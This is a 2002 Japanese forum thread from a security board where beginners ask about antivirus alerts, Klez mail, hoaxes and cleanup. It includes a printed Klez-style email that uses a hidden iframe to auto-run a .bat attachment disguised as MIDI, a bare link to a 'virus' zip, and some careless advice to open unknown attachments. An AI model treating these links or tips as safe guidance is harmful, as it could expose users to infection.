ローカルディスクの容量が増え、とりあえず解決したようです
どうもありがとうございました〜m(_ _"m)

こんどは、ＯＳの文字化け。
最悪

>>288
おめでとう。

つーか、サポートに聞けよ。
すでに板違いだしな。

>>ちびた
どうせフォントキャッシュのアレだろ？
winFAQとか検索しなよ

「民主党はインターネットを経由してパソコンソフトを破壊するなどの被害
を与えるコンピューターウイルスを取り締まるための「コンピューターウ
イルス防止法案」（仮称）を秋の臨時国会に提出する。多様化しているウ
イルス被害に対応するため、被害発生の有無や内容にかかわらず、ウイル
スを作ったり、配布、送信するだけで処罰の対象とするのが柱だ。」

http://www.nikkei.co.jp/news/seiji/20020814AT1EI007013082002.html

こちらのほうが少し記事が長い。
http://it.nikkei.co.jp/it/top/index.cfm?i=2002081307714j0

今日ノートンを買ってきて、いれました。
ウィルススキャンしたところ、「Macro.src]というウィルスが
検出されました。
修復できないらしいんで、検疫のところにいれてあるんですが、
削除するべきですか？
ほんと何もわからなくて・・・お願いします。

>>293


181 名前： ひよこ名無しさん 投稿日： 01/12/08 14:42 ID:Wz7+XgCU

WinMeでＩＥ６とメーラーは、Ｏｕｔｌｏｏｋを使っています。
プレインストールされていたMacfeeとトレンドマイクロのオンラインウイルススキャン
では、何もでませんでしたが、シマンテックのオンラインスキャンで、一つのファイル
が感染していると云われました。
C:/WINDOWS/TemporaryInternetFiles/Content.IE5/A9T9C750/sec[2]
Macro.src
　それで、Ｍａｃｒｏ．ｓｒｃというののことをシマンテックのサイトで調べましたら、
特に詳しいことは書いていなかったのですが性質がワイルドと書いてありました。
　皆様にお聞きしたいのは、この、『性質がワイルド』というのはどういうことか
ということと、このファイルを削除してしまっても、システムに問題など起こらないか
ということです。
　あと、もう一つ、ノートンは、ＰＣとの相性があると聞いたことがあるのですが、
本当ですか？（私のＰＣはバイオのノート型なのですが大丈夫でしょうか）


183 名前： ひよこ名無しさん 投稿日： 01/12/08 14:44 ID:???

＜181
C:/WINDOWS/TemporaryInternetFiles/にあるファイルは削除しても問題ない。

>294
ありがとうございました！！
同じケースでした。
既出なのにわざわざすみませんでした。

>>290様
「フォントキャッシュのアレ」とは、なんのことでしょうか？
すんません、教えてくださいませ！

オンラインウイルスチェックでは、感染してないと出ました。

>296
もういい加減セキュリティとは関係ない。

ここまで。

>>296
ここの2を。
☆★質問の前にこのFAQ集を見てね★☆7/13
ttp://pc.2ch.net/test/read.cgi/pcqa/1026520939/

あとはここで。
パソコン初心者板総合質問スレッドVol.117
ttp://pc.2ch.net/test/read.cgi/pcqa/1029308096/

＞DSL導入時のウイルスバスター2001への対策　http://www.trendmicro.co.jp/product/vb2001/adsl.htm
一部機能をレジストリキー削除でスタートアップから外すんですが、
その後の再起動から、Explorerがログイン後バスターのスタートアップ時にに落ちることがある。

数回あとの再起動時、プロンプトからGUIに切り替わってすぐにブルーバック
メモリのどっかがトラブって、ダンプしていますという表示のままフリーズ

そのあとから、ログイン画面でctrl alt del押下時に、入力画面の前に
タイトルバー”・”メッセージ”・”OKボタンのみのポップが出るようになった。

再診パターンファイルのVB2001で検索してウイルスなし。
これは単にレジストリぶっ壊れですか？

66.115.46.194,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 10.224.72.159,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.178.91.133,4710
ﾌﾟﾛｾｽ名は N/A

昨日今日と添付ﾌｧｲﾙ付ﾒｰﾙがきました。
ﾀｲﾄﾙは英文、中身も英文、ﾌｧｲﾙ名は「no_failname」と怪しさ全開です。
でも、ﾉｰﾄﾝは全く反応しません。
もちろんｳｨﾙｽ定義は最新です。
新しいｳｨﾙｽなのでしょうか・・・？

>>301
人柱という言葉を知っているかね

>>301 それだけの情報ではわからない。
個人的にはKlezの壊れたﾔｼのような気がするが。人柱になるのが嫌なら捨てる。

>>301
SARCにでも提出しろ。
「その方法は？」はあらかじめ却下。マニュアル読め。

ファイヤーウォールでZONEARAMEと言う奴を使っていたのですが
使い勝手が悪いので初心者でも簡単に使えるファイアーウォールを教えてください

見覚えがあるような、ないような（ハッキリ覚えていないのです･･･）人から
メールが来ました。
なんでも、jdbgmgr.exeという、ノートン先生などでは
みつけられないウィスルだから削除しろと書いてありました。
さっそく検索してみたらそのファイルがみつかりました。
ウィルスバスターはこのファイルにウィスルは検出されなかったと言っています。

「14日間静かにしていて14日後 にシステムを破壊する」とメールに
書いてあるのですが、Ｃドライブに見つかったこのファイルの作成日は5月で、
とっくに14日経っているのですが･･･？
今のところどこを破壊されたのかよくわからないので、不安です･･･。

どうしたらいいのでしょうか･･･。

>306です。
メールを送ってきた相手は、以前オークションで取引きをした相手でした。

>>306
http://www.google.com/search?q=jdbgmgr.exe&hl=ja&lr=lang_ja
検索しろ

>>306 それ、3ヶ月も前に流行ったデマ。
http://www.ipa.go.jp/security/topics/alert140515.html
検索ぐらいしろよな。

>>305

XPでも買えば。デフォルトで入ってるぞ。
つーか、使いにくいなら使うな。

>>309
ケコーンする？

ウフッ

>306-307
レスありがとうございました。
デマですか。
どうもおかしいなとは思っていたのです。

ｹｺｰﾝおめでとうございます。

>>298さま
ありがとうございます。あなたは神です。
セーフモードにしたら、文字化けはなおりました。

しかし、スクロールのほうは、いまだなおっておりませんが（死

以降>>314は放置で。

>>302-304
ﾚｽありがとうございます。
「添付ﾌｧｲﾙ開いてみたい！」と思います。でもやはり止めときます。
即ｺﾞﾐ箱に捨てていますが、ﾉｰﾄﾝが反応しないのが不思議で。
今度来たら捨てずにSARCに提出してみます。

ありがとうございました！

>>316
FinalDataか何か持ってないの？
もったいない。passwor＋zip圧縮で保存しなさい。

>>317
passwor< これ凄いよね！！

1024bitのEnCrypterでしょ？
PGPなんて目ぢゃないね。
・・んで、どこで落とせるの？？

質問させてください

多分ですがトロイを仕組まれたようです。環境は
Win2K(SP3)
ノートン2001（パターン最新）
BlackICE（最新）
DSL常時接続
にて使用しています。
昨日BlackICEで突然１５件ほど一気にアタックを受けた後に
Administrator権限でもアプリ(全て)の起動ができなくなり、
System32フォルダへのアクセスができなくなりました。

とりあえず自分でサイトを回って調べたのですが、どれにやられたのかがわからずに困っています
できるだけ仕事などのファイルはサルベージしたいのですが、どうすれば良いでしょうか？

>>319
Runas使って何とかならんの？

>>319
パターンファイルの日付は？
Norton Internet Security だけっていう落ちはないよね。

最悪、別のPCにつなげてサルベージ。

>>319-320さん

レスありがとうございます。
Runasですが、実行を拒否されますた(T-T)
パターンファイルは多分最新です（１１日に更新しています）
スペアマシンにつないでサルベージですかね．．．やっぱ

土日に頑張って２００G助けてみますです（号泣）

>>322
これでも試してみては？
http://www.moosoft.com/thecleaner/

regeditもダメ？

ここのスレをかちゅで見ようとしたらノートンがウイルスがいると警告を出したけど
なんで？

ttp://game.2ch.net/test/read.cgi/ff/1029256768/

>>324
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50
何回目だろう・・・

>>323さん

これは知りませんでした。
regeditはタスクマネージャーからのみ呼び出しができますが、
レジストリ周りは私がそんなに詳しくないのでどうにも...
ただ自動実行のあたりのキーは変なものはなかったです。
起動するたびにどんどん動作が怪しくなってますので、いじらない方が無難かも

サルベージの時に紹介していただいたソフトも使ってやってみます

>>326
一応、使ったことはないので保証はできないけどね。
どこかのPC系ニュースサイトで見た記憶があるから、それなりに使えるかもしれない、というだけ。
マターリがんばれ。

windows2000ユーザなのですがwinntの中に”藁”とか”・”とかっていう
ファイルがありました。
これって何かのウイルスに感染してるのでしょうか？
不安でしょうがないです。。。

>>328
まず、ウイルス対策ソフト名は？
定義ファイルはいつのだ？
スキャンした結果は？
拡張子はないのか？

ネタ決定まであと2レス。

mcafeeのヴィールススキャンです。
定義ファイルは最新ものです。
スキャン結果は異常なし
拡張子はなしです。
ほかに”・”ってファイルもありました・・・。

>>330
ファイルのタイムスタンプに思い当たることは？
最近何か普段と違うこと（インストールとか添付ファイルを開いたなど）をした記憶は？

何もなければ削除してもかまわんと思う。
暇ならSARCにでも提出してみたら？
バイナリエディタで開いてみるとか。

あのfree.Links　B　に感染してしまったのですが，
感染されていると思われるC:/WINDOWS/TemporaryInternetFiles/Content.IE5
にあるファイルを手動で削除しましたが，
その後スキャンしても検出しなかったのですが，
これで大丈夫だったのでしょうか？ちなみにウィルスソフトは，
Norton AntiVirus 2002，メールソフトはNetscape6.21です。
OSはXP，IE6　宜しくお願いします。

>>332 スキャンして検出しなかったのならＯＫ。
NAVの最新ファイルは、
http://www.symantec.com/region/jp/sarcj/defs.download.htmlで。
現在Liveupdateが壊れているみたいなので。

昨日ﾉ-ﾄｿがＶＢＳ.LoveLetter.Verに感染しています。
の警告が出て、削除しようとしたらファイルへのアクセスが拒否されますた。
それでコンピュ−タをウィルススキャンしてみましたら
緊急注意からシステムOKになっていました。
いったい何なんでしょうか？
詳しい方どうかレスお願いいたします。

>>334 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>335さん
ありがとうございました。
そうゆう事でしたか。
すごくストレスになっていたのでホットしました。
初心者ですいませんでした。

age

なんか画面にピースマークの偽者見たいなのが
いっぱい暴れ回ってたんですけどウィルスですか？
パソコン買ったばかりなので、誰か教えて下さい。

>>338
たぶんね。
ご愁傷様。

>>339
ウィルス駆除ソフトとかで何とかなるんですか？
何度もすみません。何かが消えたとかはないんですが。

>>340
はい。キミの使うPCのOSと接続回線の種類、入れている対ウィルスソフトの名前などを
書いてください。ピースマークの偽者はPCを起動してから終了するまでずっと画面にいるの？

すいません、ＯＳとか言われてもよくわかりません。
偽者はいないん電源が切れていなくなったんですけど
すぐパソコンが止まって強制終了とかもできなくなったりします。
素人すぎてすいません。

>>342
買ったばかりでかぃ。たまらないね。
OSというのはたとえばWindows XPとかMeとか98とか、そういうの。
接続は常時接続じゃないね？ADSLとか。

>>342
大変だね。
とりあえずつながってる回線引っこ抜いて、有料PCサポートに電話してごらん。
3万円もあれば再インストールからアプリの導入までやってくれるよ。

xpです。ADSLと思います。ウィルスソフトはないので買いに
行こうと思ってます。どれがいいとかがわからないので。

>>342
買ってからどんなソフトを入れたの？ゲームとか？
いちどスキャンディスクをしてみて。スタートからプログラム、アクセサリ、
システムツールとたどっていけばみつかるから。チェック方法は「標準」でやればいいよ。
（「完全」でなくて）

みなさんやさしいですね。ありがとうございます。
>>344
電話してみます。
>>346
システムツールの次何をしていいかわかりません。
すいません。

>>347
システムツールの次にいろいろ名前が出る中に、スキャンディスクってのがあるよ。

>>347
ありがとうございます。がんばってなんとかしてみます。
私の中では347さんが神ですよ！

画像閲覧ソフトを
http://homepage1.nifty.com/k_okada/
ここからダウソしたのですがexeファイルがあって不安です。
大丈夫でしょうか?

んー
ピースマークの偽者って言うと
ttp://www.raus.de/crashme
このブラクラを思い出すんだが、単なるブラクラじゃないの？

>>349
一応聞いておくけど。
再起動はしてみた？
んで、ミ田（ウインドウズキー）＋R
もしくはスタートメニューの「ファイル名を指定して実行」で
msconfig
でスタートアップを全部無効にしてみるとか。
まだウイルスと決まったわけじゃないし。

>>350
ま、普通ソフトならexeファイルはあるわな

そんなに不安ならフリーのでもいいからウィルス対策ソフトぐらい入れろ
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50


個人的にはソフトウェア板でVixは危険ですか？って聞いて
思いっきり罵倒されて来い、と思う

>>347　（これはキミだ）
で、ADSLなら話は速い。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
このページの上にあるダウンロードをクリックし、次のページの使用許諾条項に「同意する」を
クリック、簡易版のアンチドートをDLして。使い方は最初のページにリンクがあるから
そこから読んでみる。それでうまく使えたら、PCが今ウィルスに感染しているかどうか
わかるから（ファイル等全部OKなら感染していない）、もしウィルスの名前が出たら
それをカキコしてくれればいいよ。
あ、今351を見たけども、今回大したことがなくてもこのアンチドートはいざというときに
使えるから、お気に入りにでも入れて覚えておいて。（使うたびに最新のをDLすること）
あと、金があれば何か常駐するウィルス対策ソフト買って入れてください。ただのでも
いいけどね。このスレの>>2を参考に。

殺伐としたスレが多い中、久しぶりにマターリしたよ。（W

今スキャンディスクっていうのしてきました。以外に早く済みました。
それで話を聞いてもらったみなさんには悪いんですがなんか直ったっぽいです。
本当におさがわせしました。そしてありがとうございました。
347って私でしたね（ｗ

ブラクラだったに決定
でもせっかくセキュ板まで来たんだから
フリーでいいからアンチウィルスソフトいれなさい

>>356
まあせっかくだから言っておくと、まさかの時に備えてPC内の大切なデータやメール、
使用してるソフトの設定なんかをバックアップしておくといい。CD-RかCD-RW、MOでも
いいし大容量のメディアをなにか持ってるなら今すぐにでも少しづつ作業しておいて。
それから起動ディスクフロッピーも作っておくべ。
ttp://www.microsoft.com/japan/windowsxp/expertzone/tips/august/renken1.asp
ま、たぶんやってくれないと思うけど。（ｗ

質問です。

知り合いがどうやらｳｲﾙｽに引っかかったらしいのですが、、、

症状は
BIOS後にネットワークに接続となってOS（win98）が起動出来なくなった
との事ですが、これだけでウイルスの名前判りますか？

>>359
わからん

どうもでした

>>361
笑　　もっとくわしく書かないとね。

>>353
レスサンクス!
ノートンを入れていますが反応しない物もあると聞いて
不安だったのです。

>個人的にはソフトウェア板でVixは危険ですか？って聞いて
>思いっきり罵倒されて来い、と思う

それもまた一興（W

age

以下のページでウイルスに感染してしまったようです。
http://sakai.cool.ne.jp/cleopatra4520/res/index.htm
かってにウイルスのある場所にホームページを書き換えられます。
どうすればもとに戻せるでしょうか？

>>365
http://securityresponse.symantec.com/region/jp/sarcj/data/v/[email protected]
読め。

>>366
ありがとうございました。
治りました。

ウィルス付きのMP3ってどうやって被害を与えるのでしょうか？
普通に聞いてても発症するんですか？

mp3ファイルって主に再生する以外に何に使うんだろう？
その主たる使用方法で発症しないとしたら
ウィルス仕込むことに何の意味があるんだろう？

>>369
そのレスになんの意味があるんだろう？

>>368
http://www.zdnet.co.jp/news/0203/19/e_mp3.html
http://japan.cnet.com/News/2001/Item/010630-3.html?rn

>>371
どうも、ありがとう

daan 　 8月13日 　火 　 133kb　 Hi,(ぼくのname),questionnaire
ヤフーのメイルBOXにこんなのがあります。クリックすると自分のパソコン壊さ
れますか？どうしても読みたい場合、マンガ喫茶のパソコンを使えば平気なので
しょうか。

>>373
開かずに捨てる。
自分のPCじゃないからいいという考えは捨てろ。

ダイヤルアップで接続が完了したときにフロッピーを読みにいくように
なってしまいました。
どこに接続しているかは関係ないようです。
ウィルスなんでしょうか？

2Chの掲示板見てたら（Macro.src）に
感染しました。ファイルの修復はできないのか誰か教えてー

>>373
メールヘッダを書き込んでくれ!!!!!!!!!!!!!!!!!!

ヤフーはhtmlメールをそのまま開かない。
意図的に添付ファイルを開けば感染。

昨日の晩からウィルスメールが山ほど送られてます。。。
送信者[email protected]。
１分に１通です。

んで、質問です。
・サーバーが応答しません。って出て６通ずつしかメールを取り出せません。
まだサーバーに何百通（orそれ以上）もメールが溜まっていると考えられる
んですが、６通ずつじみちに取り出すしか方法がないですか？

>>378
DLしないでサーバ上で削除すれば。OEだったら知らんけど。
Vectorにも色々あるでしょ。

>>378
＊＊通受信中と表示されるはず。

添付ファイルをサーバーで削除にする。

　

無知ですみません。自分でも調べているのですが。

サーバー上で削除するってのは自分でできるんですか？ プロバイダ（ゼロ）には「削除して欲しい」っていうメールを書きました。
送受信すると１２通受信中って出て、７通目でサーバーが応答しなくなります。 その繰り返しです。来ているメールは ・１通目、添付ファイルあり
The original message was received at Fri, 16 Aug 2002 23:44:08 +0900
from tky08-f232.alpha-net.ne.jp [61.205.39.232]
----- The following addresses had permanent fatal errors -----
<[email protected]>
----- Transcript of session follows -----
... while talking to mx07.hotmail.com.:
>>> RCPT To:<[email protected]>
<<< 552 Requested action not taken: exceeded storage allocation
554 <[email protected]>... Service unavailable
・２〜５通目はundeliveredの通知
・６通目は
┏━━━━━━━━━━【ご確認下さい】━━━━━━━━━━┓
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
「healthクリック」が提供しております健康情報メールマガジン 「ヘルスケア・マガジン」への退会申し込みをいただきましたが、
ご入力いただいたアドレスは登録されておりませんでした。 転送の設定などをご確認の上、お申し込みいただいているアドレスから
再度解除のお申し込みをいただきますようお願い申し上げます。 なお、ご不明な点は mailto:[email protected]
までお願いします。 ■━━ヘルスケア・マガジン━━━━━━━━━━━━━━━━┓ [編集発行責任者]
株式会社NTTデータ healthクリック事務局 〒135-6033 東京都江東区豊洲3-3-3 豊洲センタービル [お問い合わせ窓口]
mailto:[email protected] ┗━━━━━━━━ Copyright(C) 2000 NTT DATA ━━━━━━■

>>382
nPOPで検索してみ。自分で削除出来るよ。

>382
今からやってみます。ありがとう。

>382
削除できました。ほんとありがとう。

サーバー上には６通ありました。
あれ？６通しかないのか？？？と思い、アウトルックで受信してみると、
状況は前と変わらず、６通取り出して応答不能。６通取り出して応答不能。
の繰り返し。
サーバー上の６通を削除してみると、アウトルックでは受信件数０となりました。

つまり、アウトルックで取り出したメールがサーバー上では取り出せていない。
サーバー上に同じメール（６通）が常時滞在し、
アウトルックで受信するたびに同じメールを取り出している。
ってことなのかな

　はじめまして。
　いきなりですみませんが、今朝方(午前８時ごろ)ネットに接続中、
知らない間に　"crackler.exe"　というファイルが、c:\windows\temp
上に展開されていました。\temp の下には　ナントカ　とかいう(名前忘れました)
ディレクトリが作られていて、そのなかに　\crackler　というフォルダが
作られていました。

　気が付いたのは、ＰＣが異常を感知し、メッセージを表示していたからなんですが、
このファイルはいったい何者なんでしょう。
　怖かったので、ＥＸＥファイルと\tempの下のフォルダごと削除しましたが、
今後、どうすればいいでしょうか？

　いちおう、マカフィのウィルス･スキャンを入れているんですが、
ウィルスは駆除できても、不正進入(ハッキング？）にはお手上げなんでしょうか？

　(分かりづらくてすみません。今のところ実害はないです)
よろしくお願いします。

そりゃまぁ、
アンチウィルスソフトはパーソナルファイアーウォールじゃないからね・・・

文面からなんとなく
馬鹿フィはPCのプレインストールでウィルス定義は最新かどうか怪しい上に
IEをパッチあてないでつかってて
あまつさえOEを「メールのプレビュー」にチェックしたまま使っている・・・
そんな匂いがするんだが、どう？>>386

>>387　レスありがとうございます。
　　　　そうですか、マカフィは馬鹿ですか。。。

　　　　ウィルス定義は最新です。
　　　　ＩＥはこのあいだ、ＷＩＮＤＯＷＳ　ＵＰＤＡＴＥで更新しました。
　　　　（特に新たにＤＬする必要なものはないそうです）
　　　　ＯＥは使っていません。ジャストシステムのキャラメルというメーラーを使っています。
　　　　「メールのプレビュー」は機能として付いていません。

　　　　で、ファイアー･ウォールは購入してあって、ＤＬファイルもあるんですけど、
　　　いちいち、不正アクセスのメッセージを表示してくるので、
　　　うざったくて、アンインストールしちゃいました。

　　　　で、さきほどここにカキコした後、再度ファイルを展開しようと
　　　したところ、なぜか１年間の利用料のようなものを支払わないと、
　　　起動できないようになっちゃってるんですよ。

　　　　むかついたので、ＦＷ　なしでしばらく様子を見ます。
　　　どうもでした。m(vv)m

>>388
馬鹿フィは使ったことないけど、フリーのFWくらいはいれようよ。

この板の流れからいくと、有料なソフトなら
ノートン=バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>馬鹿フィーって感じ
検知率は悪くないんだけどねぇ・・・

んでこの板を見ればフリーで高性能で使い易いPFWはいくつかある
最初はZoneAlarmかOutpostあたりがおすすめ
あとスパイウェア検知ソフトのAd-awareも入れた方がいい

スパイウェア検知じゃなくて駆除ですたね・・・

>>むかついたので、ＦＷ　なしでしばらく様子を見ます。

その手が有ったとわ｡｡｡なかなか高度なｿｰｼｬﾙｴﾝﾁﾞﾆﾔﾘﾝｸﾞだ｡｡

ちか、、ﾃﾞﾚｸﾄﾘ掘ってﾌｧｲﾙｺﾋﾟｰしてﾚﾁﾞｽﾄﾘｷｰのｱﾉ辺りに起動用値ｶｷｺすれば良いだけでしょ？？
んなもん、なんでQ2ﾀﾞｲｱﾙﾌﾟﾛｸﾞﾗﾑ、ｸﾘｸしただけで読み込まされるかわからんようなﾔｼが相手ならﾊﾞｸﾞ利用しなくても逝けるﾍﾞ

>>389-392　情報ありがとうございます。フリーでｆｗがあるんですか。
　　　　　　早速入れてみます。
(馬鹿ふぃとの契約が切れたら、ほかのに変えようかと思います。
　でも、Ｋｌｅｚは検知してくれました)

クレズに感染し、あちこちにメールを送信してるみたいなので
　メールアドレスを削除し（送受信ができない）、アドレス帳を削除したら
とりあえずは感染メールをばらまかないでしょうか？
　初めて感染して落ち込んでます、アドバイスお願いします。

>>394
駆除しろよ・・・
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

初歩的な質問ですみません
Outlook Expressを使用しています
バージョンは5.5SP2です
感染しないようプレビューをしないようにしております
知り合いから添付ファイルが届きプロバティ＞詳細を見たのですが、
どの部分が添付ファイルの情報なのかわかりません
gogleなどで「添付ファイル　プロバティ」などを入力して見るも
見方などが書かれているHPなどが見つかりませんでした
どうか教えていただけませんでしょうか？
もし、自分に届いている情報をこちらに書きこむ際はどの部分を
記載したらよろしいのでしょうか？
合わせてお願い致します

みなさんに質問します。
ノートンアンチウイルス使っているのですが
先ほどウイルス警告、コンピューター上でウイルスを検出しました。
ウイルス名MACRO.SRC
ファイルを修復出来ません。ファイルへのアクセスを拒否されました。
一応UPdeteとシマンテックのＨＰ上からも駆除ファイルをダウンロードしたのですが、
2ｃｈのスロ板にアクセスするとまた同じ警告が出ます。
初心者なのでどうしたらいいのかわかりません・・・
どうしたら駆除出来るかどなたか教えて頂けませんか？お願いします。

>>397

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

>>398
ありがとうでした（＾＾）安心しました

>>396
http://www.infoseek.co.jp/GTitles?qp=0&nh=10&arn=GK0103311010&qt=%A5%D7%A5%ED%A5%D1%A5%C6%A5%A3&col=GK&st=0

>>400
ありがとうございます

以前ﾒｰﾙ友達だった人物から突然、ウィルスが送られてきました
あやまってそれを開いてしまうと、突然、私のパソコンがメッセージを作成しだして
どうやら３０通くらい送ったようです。
そして何時間後かにMail Delivery System で２０通ほどかえってきました。
これは、何というウィルスですか？
対処法等　教えてください

>>402
それだけで分かる人間いるわけないだろ。
アンチウィルスいれてないならまずは
http://www.trendmicro.co.jp/hcall/index.asp
に行け。
駆除が終わったら
http://pc.2ch.net/test/read.cgi/sec/1027400238/
に行け。
それとOutlookは使うな。
分からん添付ファイルはダブルクリックするな。

今日だけで２通もウィルスメール(クレズ)が来たよ〜。こわいよ〜。
送信者の名前も件名も違うし、俺って狙われてるの?
今まで３年間一度もこなかったのに。

で、AVG入れてたので、ウィルスを確認した画面が出てきたのですが、
日本語化してなかったので、ENABLE ACCESS? ときかれて、
YESかNOか、どっちをクリックしていいかわからなかった。
迷っているうち、その画面は自動的に消えたけど、
べつにいいんですよね?

それと、クレズって添付ファイル開かなきゃだいじょうぶなんすよね。

>>404
OEなりOutlookでも、パッチ入ってるなら大丈夫。

いま、怪しいメールが来たんです
NAA01477 <[email protected]>

A special nice game

Hi,This is a special nice game
This game is my first work.
You're the first player.
I wish you would like it.

どうでしょう？　car［17］.jpgというファイルも添付されてきました。

>406
うちに来たのもそれだっ！

>>406
http://pc.2ch.net/test/read.cgi/sec/1028559356/556
マルチ

マルチじゃないっての！
放置だったから、くだらねえにもカキコしただけ

>>409
逆ギレかよ。
Klezに6なめこ。

それがマルチじゃなかったら何がマルチだ？厨房が
>>1-2
にウィルス検索できるとこリンクされてるだろうがこの糞厨房
放置だと？即レス期待してんじゃねーよタコ厨房
自分で調べろこのケサランパサラン
厨房の相手する方がくだらねぇよ

>>411
> 自分で調べろこのケサランパサラン
おもろい

（￣ー￣）ﾆﾔﾘ

それがさ、スキャンしても全然かからないんですよ
で、ｊｐｇファイルの方は、車の画像が出てきただけ・・それも見覚えのある・・
もう一つファイルがあって、クリックすると、インストールして実行しますか？
と出たので、やめといた

クレズかなぁ
なんせ、初めてなもんで・・・

,,,,.,.,,,,
　ﾐ・д・ﾐ ＜ｹｻﾗﾝﾊﾟｻﾗﾝ!!
　 """"

>>414
以前届いたエロスクリーンセーバーもそんな感じだったよ。
実行したらもろのロリ画像だった。

どうすればよいですか？

>>418
検出されないなら開いてみたら？多分大丈夫。
エロだったらうpしてね。

無視だろ。

>>418
結果報告きぼーん

開いたら、さっきからＨＤがうなっております

初めてウィルスにやられた。。。
クレズＨさん･･･。キライ。

>>396
遅いけどね。レス400でわかったのかぃ。
ttp://www.chokai.ne.jp/ishigaki/mono28.html#no.1099
↓ここはContent-Typeの説明を読んでね。
ttp://www.puni.net/~mimori/header/

396です
>>424
レスを頂いて御礼はしたものの400では分かるはずないです・・・
ﾊｧｰｰと落ち込みました
424さんに教えていただいたURLで分かりました
本当にありがとうございました

Klez
From:lead< lead＠mail.okuninet.co.jp >
To: [email protected]
[email protected]
Subject:Hi,please try again
Date:**
Received: from [202.248.37.209] by ** with ESMTP id **; **
Received: from Bmnsektby mail501.nifty.com (8.12.4/3.7W-02/25/02)
with SMTP id g7HCklCf001194 for < [email protected] >; **
From [email protected] **
Message-Id:< [email protected] >

友人がウィルスに感染して、仲間内にウィルスメールが届いてます。
その内の一人が「ウィルスバスターしたから大丈夫メール見てみよ」って
そのウィルスメール開こうとしてたらしいんですけど、
バスター通したら(?)無害になって見ても大丈夫になるんですか？
イマイチ意味がわからない・・・。

果たして11歳の少年が大の大人の女を強姦できるか
http://tmp.2ch.net/test/read.cgi/asia/1029428265/429

ウイルス感知されますた。

スズメバチ駆除　ビーバスターズ　
　http://ww41.tiki.ne.jp./~mikihiro9649/

>>427

感染したファイルからウイルスを駆除したという意味かな？
で、どうしてまた開きたいの？

http://211.134.114.148/uirusu.zip
oo

a

>>430
本人に聞いたところ、メール受信の時にノートンが反応して検疫したと言っておりました。
なんでそれが「バスターした」という言葉につながるのか謎・・・。
検疫したからメールからウィルスは駆除されていると思ってるみたいです。
何故開きたかったのかはよく分かりません、怖いです。

ウイルススキャンに引っかからなくても
感染してることありますか？

>>433
検疫 == 感染したファイルが隔離された
ゆえに削除はされていない。特定の場所に保管されている。
どうしても調べたいのならバイナリエディタで開いてごらん。
つーか、開いても大したことは得られないと思うよ。

先月のふれぜむはウィルス定義対応前に感染しちまった

>>436
変種が一度にたくさん一気に出たからね。

>>434
なぜパターン更新が重要か分かりますか？

覚えている方はいないかもしれませんが、
スクロールの件、なおりました。
原因は、マウス不良でした。
おさわがせしました。

>ちびたたん
乙。

これって何のウィルスですか？
件名は何も無く、Return-Path、From共、人の名前だけど、どちらも心当たり無し。
comdesignsで検索したけど、出ませんでした。
ウィルス名と誰からかを知りたかったんですけど・・・

Return-Path: <*****@comdesigns.co.jp>
Delivered-To: *****@*****.ne.jp
Received: (qmail 27724 invoked from network); 18 Aug 2002 20:14:50 +0900
Received: from unknown (HELO comdesigns.co.jp) (210.154.34.34)
by tp01001 with SMTP; 18 Aug 2002 20:14:50 +0900
Received: from Onwhate [218.222.59.254] by comdesigns.co.jp
(SMTPD32-6.04) id A0F04100F2; Sun, 18 Aug 2002 20:11:44 +0900
From: ***** <*****@d1.dion.ne.jp>
To: *****@*****.ne.jp
Subject:
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Message-Id: <200208182011562.SM01296@Onwhate>
Date: Sun, 18 Aug 2002 20:15:39 +0900
--T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Mo657CEQM336iDh63 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
--T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Content-Type: audio/x-midi;
name=横書きIDX.bat
Content-Transfer-Encoding: base64
Content-ID: <Mo657CEQM336iDh63>

>>441
件名やファイル名や添付ファイル名のみでウイルスを同定できる時代は、終わっとります。
何かアンチウイルスソフト使ってスキャンしたらどうでしょ。

何にも入れてないならAVPEぐらいいれとき

>>442-443
PCがかなりボロイので、新しいソフト入れると（特に高機能高性能ソフト）
おかしくなっちゃうから、アンチウィルスも我慢してる状態です。
その分気を付けて、今迄メールウィルスは100通以上は来たけど
今の所は開いてないので、新しいPC買うまでもう少し粘ろうかと・・・
（一応プロパティ見た後、オンラインチェックしていますが）

だいたい件名等から調べたてけど、これは無かったので聞いてみました。
これだけじゃ判らないんですね。
どうもでした。

>>435
ありがとうございます、隔離されてるだけだと言っておきます。
実はこのウィルスメールは自分の所にも届いてるんですが
うちのノートンは無反応です・・・どうして。

>>444
スキャンの動作が重いんで時間かかるけど。
インスコしないで利用できる、Antidote 簡易版とか。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
ウイルスの処理はできないけど、ウイルス名を知るだけの目的ならどうぞ。

>>446
ありがとございます〜。
さっそく見てみました。
これなら何とか使えると思います。
感染してなくても、メール添付の時点で判るのかな？
早く次のウィルス来ないかな〜。（ﾜｸﾜｸﾄﾞｷﾄﾞｷ

>>447
>メール添付の時点で判るのかな
リアルタイムスキャンはできませぬ。
だもので、ウイルス名を知るためには、受信後に毎回手動でスキャンする必要がありまする。

ウイルス欲しいのならメアド晒せば？

pen133Mhzメモリ16MBのノートでもAVPE動いてますが何か？



常駐はダメぽ・・・

>>441
klezじゃない？
添付ファイルをデスクトップとかに移さないと検知できないこともある。

当方Win2000なのですが、WinNT以外のディレクトリを対象に
全HDDドライブでファイルだけがきれいになくなってしまった。
ディレクトリは残っていますが、当然のごとく０バイト。
AVGを入れてましたが、特にチェッカーしたような挙動は
感じられず。
これってウイルスの仕業なのか？

